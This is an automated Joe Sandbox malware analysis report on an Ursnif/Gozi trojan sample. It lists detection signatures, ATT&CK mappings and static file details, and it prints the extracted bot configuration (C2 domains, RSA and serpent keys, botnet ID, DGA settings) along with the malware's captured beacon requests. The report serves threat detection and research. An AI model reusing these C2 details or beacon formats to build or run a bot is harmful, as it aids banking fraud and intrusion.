Windows Analysis Report R0xLHA2mT5.exe

Overview

General Information

Sample Name: R0xLHA2mT5.exe
Analysis ID: 528072
MD5: 9f3b8462c508884f6966f3ad4a275799
SHA1: 6288e611de585a6dc56c6399ef03012698d60392
SHA256: a548ac73d6acb5a260cb2e1760946c37ce94d89f3cd2a5b126e266e007dfc543
Tags: exe, Gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Writes or reads registry keys via WMI
Machine Learning detection for sample
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication

Process Tree

  • System is w10x64
  • R0xLHA2mT5.exe (PID: 3608 cmdline: "C:\Users\user\Desktop\R0xLHA2mT5.exe" MD5: 9F3B8462C508884F6966F3AD4A275799)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.R0xLHA2mT5.exe.22b0000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.R0xLHA2mT5.exe.42a94a0.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.558633327.0000000002130000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (same configuration as shown under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: R0xLHA2mT5.exe | Metadefender: Detection: 22%
Source: R0xLHA2mT5.exe | ReversingLabs: Detection: 45%
Machine Learning detection for sample
Source: R0xLHA2mT5.exe | Joe Sandbox ML: detected
Source: 0.2.R0xLHA2mT5.exe.2130e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.R0xLHA2mT5.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.3.R0xLHA2mT5.exe.2140000.0.unpack | Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Unpacked PE file: 0.2.R0xLHA2mT5.exe.400000.0.unpack
Source: R0xLHA2mT5.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 74.6.231.21:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: Binary string: C:\julokapinuf\da.pdb source: R0xLHA2mT5.exe
Source: Binary string: C:\julokapinuf\da.pdbP+C source: R0xLHA2mT5.exe
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 74.6.231.21
Source: Joe Sandbox View | IP Address: 87.248.100.216
Source: global traffic | HTTP traffic detected:
    GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: yahoo.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.yahoo.com
    Cookie: B=0kqfhp5gpsta9&b=3&s=ki
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    date: Wed, 24 Nov 2021 17:24:25 GMT
    p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
    cache-control: private
    x-content-type-options: nosniff
    content-type: text/html; charset=UTF-8
    x-envoy-upstream-service-time: 12
    server: ATS
    Content-Length: 1048
    Age: 2
    Connection: close
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=0p10fa5gpsta9&partner=;
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
Source: unknown | DNS traffic detected: queries for: yahoo.com
Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B5988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_022B5988

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
Source: Yara match | File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY
Source: R0xLHA2mT5.exe, 00000000.00000002.559091455.000000000234A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

                  System Summary:

                  barindex
                  Writes or reads registry keys via WMIShow sources
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Writes registry values via WMIShow sources
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: R0xLHA2mT5.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B836E 0_2_022B836E
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B7FBE 0_2_022B7FBE
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022BAFC0 0_2_022BAFC0
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_00401703 NtMapViewOfSection, 0_2_00401703
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset, 0_2_00401C90
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019A0
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_022B9A0F
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022BB1E5 NtQueryVirtualMemory, 0_2_022BB1E5
                  Source: R0xLHA2mT5.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: R0xLHA2mT5.exe | Metadefender: Detection: 22%
                  Source: R0xLHA2mT5.exe | ReversingLabs: Detection: 45%
                  Source: R0xLHA2mT5.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@4/2
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B8F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_022B8F1B
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: R0xLHA2mT5.exe | Static PE information: More than 200 imports for KERNEL32.dll
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: R0xLHA2mT5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\julokapinuf\da.pdb source: R0xLHA2mT5.exe
                  Source: Binary string: C:\julokapinuf\da.pdbP+C source: R0xLHA2mT5.exe

                  Data Obfuscation:

                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Unpacked PE file: 0.2.R0xLHA2mT5.exe.400000.0.unpack
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Unpacked PE file: 0.2.R0xLHA2mT5.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022BE62F push edi; retf 0_2_022BE630
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022BAC00 push ecx; ret 0_2_022BAC09
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022BAFAF push ecx; ret 0_2_022BAFBF
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022BE9AC push 0B565A71h; ret 0_2_022BE9B1
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_0042E630 push ecx; mov dword ptr [esp], 00000000h 0_2_0042E631
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_023600A6 push esp; iretd 0_2_023600B7
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_02363EAD push 12BFE4EFh; ret 0_2_02363EB2
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_0235EE91 push edx; iretd 0_2_0235EEC8
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_0235E89D push esi; iretd 0_2_0235E89E
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_02362CF3 push es; iretd 0_2_02362CF6
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_0235F184 push ebx; retf 0_2_0235F196
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_02365B88 push ds; ret 0_2_02365B89
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_00401264 LoadLibraryA,GetProcAddress, 0_2_00401264
                  Source: initial sample | Static PE information: section name: .text entropy: 7.03993935197

                  Hooking and other Techniques for Hiding and Protection:

                  Yara detected Ursnif
                  Source: Yara match | File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: R0xLHA2mT5.exe PID: 3608, type: MEMORYSTR
                  Source: Yara match | File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.R0xLHA2mT5.exe.22b0000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.R0xLHA2mT5.exe.42a94a0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Process information set: NOOPENFILEERRORBOX
                  Source: R0xLHA2mT5.exe, 00000000.00000002.559383521.00000000023C6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_00401264 LoadLibraryA,GetProcAddress, 0_2_00401264
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_0235C2F6 push dword ptr fs:[00000030h] 0_2_0235C2F6
                  Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                  Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp | Binary or memory string: Progman
                  Source: R0xLHA2mT5.exe, 00000000.00000002.559717345.00000000028D0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B7A2E cpuid 0_2_022B7A2E
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_00401E22
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_00401752
                  Source: C:\Users\user\Desktop\R0xLHA2mT5.exe | Code function: 0_2_022B7A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_022B7A2E

                  Stealing of Sensitive Information:

                  Yara detected Ursnif

                  Remote Access Functionality:

                  Yara detected Ursnif

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 1 | Process Injection 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information 2 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 22 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  R0xLHA2mT5.exe | 23% | Metadefender |
                  R0xLHA2mT5.exe | 45% | ReversingLabs | Win32.Trojan.Chapak
                  R0xLHA2mT5.exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  0.2.R0xLHA2mT5.exe.2130e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
                  0.2.R0xLHA2mT5.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
                  0.3.R0xLHA2mT5.exe.2140000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                  0.2.R0xLHA2mT5.exe.22b0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168

                  Domains

                  Source | Detection | Scanner | Label
                  qoderunovos.website | 0% | Virustotal |
                  soderunovos.website | 0% | Virustotal |

                  URLs

                  Source | Detection | Scanner | Label
                  https://soderunovos.website/ | 0% | Avira URL Cloud | safe
                  https://soderunovos.website/_ | 0% | Avira URL Cloud | safe
                  https://soderunovos.websitehttps://qoderunovos.website | 0% | Avira URL Cloud | safe
                  https://soderunovos.website/jdraw/Few7Dvcu/4Rmd9fKY9IL2UtEgJUD5q9n/BajREx_2Bc/Peb7n8IHTpfTu9y6I/faIv | 0% | Avira URL Cloud | safe
                  https://soderunovos.website/T | 0% | Avira URL Cloud | safe
                  https://soderunovos.website/s | 0% | Avira URL Cloud | safe
                  https://soderunovos.website | 0% | Avira URL Cloud | safe
                  https://soderunovos.website/0 | 0% | Avira URL Cloud | safe
                  https://qoderunovos.website | 0% | Avira URL Cloud | safe

                  Domains and IPs

                  Contacted Domains

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  new-fp-shed.wg1.b.yahoo.com | 87.248.100.216 | true | false | | high
                  yahoo.com | 74.6.231.21 | true | false | | high
                  www.yahoo.com | unknown | unknown | false | | high
                  qoderunovos.website | unknown | unknown | true | | unknown
                  soderunovos.website | unknown | unknown | true | | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        https://yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw | false | | high
                        https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw | false | | high

                            URLs from Memory and Binaries

                                                Contacted IPs

                                                Public

                                                IP | Domain | Country | ASN | ASN Name | Malicious
                                                74.6.231.21 | yahoo.com | United States | 36646 | YAHOO-NE1US | false
                                                87.248.100.216 | new-fp-shed.wg1.b.yahoo.com | United Kingdom | 34010 | YAHOO-IRDGB | false

                                                General Information

                                                Joe Sandbox Version: 34.0.0 Boulder Opal
                                                Analysis ID: 528072
                                                Start date: 24.11.2021
                                                Start time: 18:22:58
                                                Joe Sandbox Product: CloudBasic
                                                Overall analysis duration: 0h 6m 21s
                                                Hypervisor based Inspection enabled: false
                                                Report type: full
                                                Sample file name: R0xLHA2mT5.exe
                                                Cookbook file name: default.jbs
                                                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed: 17
                                                Number of new started drivers analysed: 0
                                                Number of existing processes analysed: 0
                                                Number of existing drivers analysed: 0
                                                Number of injected processes analysed: 0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode: default
                                                Analysis stop reason: Timeout
                                                Detection: MAL
                                                Classification: mal100.troj.evad.winEXE@1/0@4/2
                                                EGA Information: Failed
                                                HDC Information:
                                                • Successful, ratio: 15% (good quality ratio 14.4%)
                                                • Quality average: 82.1%
                                                • Quality standard deviation: 27.1%
                                                HCA Information:
                                                • Successful, ratio: 66%
                                                • Number of executed functions: 50
                                                • Number of non-executed functions: 52
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs


                                                                                                                                Domains


                                                                                                                                ASN


                                                                                                                                JA3 Fingerprints


                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                No created / dropped files found

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):5.862869752671554
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:R0xLHA2mT5.exe
                                                                                                                                File size:298496
                                                                                                                                MD5:9f3b8462c508884f6966f3ad4a275799
                                                                                                                                SHA1:6288e611de585a6dc56c6399ef03012698d60392
                                                                                                                                SHA256:a548ac73d6acb5a260cb2e1760946c37ce94d89f3cd2a5b126e266e007dfc543
                                                                                                                                SHA512:d9d529ed258ffaf33f729cb822fc602748772df8f8710a4a77e9d4fbea02658fd0c9a0e4d1f920c99230551705c0e643e4eac5bcca0b008f5cb48679e56c1a37
